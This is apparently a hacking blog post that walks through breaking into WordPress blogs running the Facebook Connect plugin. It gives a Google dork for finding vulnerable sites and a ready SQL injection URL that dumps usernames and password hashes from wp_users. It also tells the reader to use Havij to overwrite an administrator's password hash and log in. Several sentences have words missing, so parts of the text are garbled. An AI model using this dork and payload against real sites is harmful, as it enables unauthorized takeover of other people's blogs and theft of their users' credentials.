There is so many Pepoles using Facebook Connect Wordpress plugin for their blogs. They think it's cool. But it could be a Big Security hole. Here's the way to these sites.Step 1 :http://www.google.com
Step 2:Now enter this dork to find sites with security hole..
inurl:"fbconnect_action=myhome"
Step 3:You will find many sites, Select the site which you are comfortable with.
You will find something like that.
Step 4:Now replace
?fbconnect_action=myhome&userid=
with this
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,con(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 5:Now you have the User name and .
Step 6:The is encrypted with Wordpress md5 (blowfish). You need to de this.
Step 7:Then find the administrator panel out. Normally it should be in
www.victrite.com/wp-adminor
www.victrite.com/wp-login.p
Note:Decoding this type of may take a big time.
So you here is another way to the .....
Step 1:Open Havij and paste the blog url you are going to ..
Example:
http://www.victrite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,con%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--
Step 2:Now find Databases, Tables.
Step 3:Select wp-users then find tick on all columns. Then click on Get Data.
Step 4:You will find something like that..
Step 5:Now select any user and change the user_pass to
$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/
Step 6: Now login with the intruths .
credits to: Devilscafe.in
No comments:
Post a Comment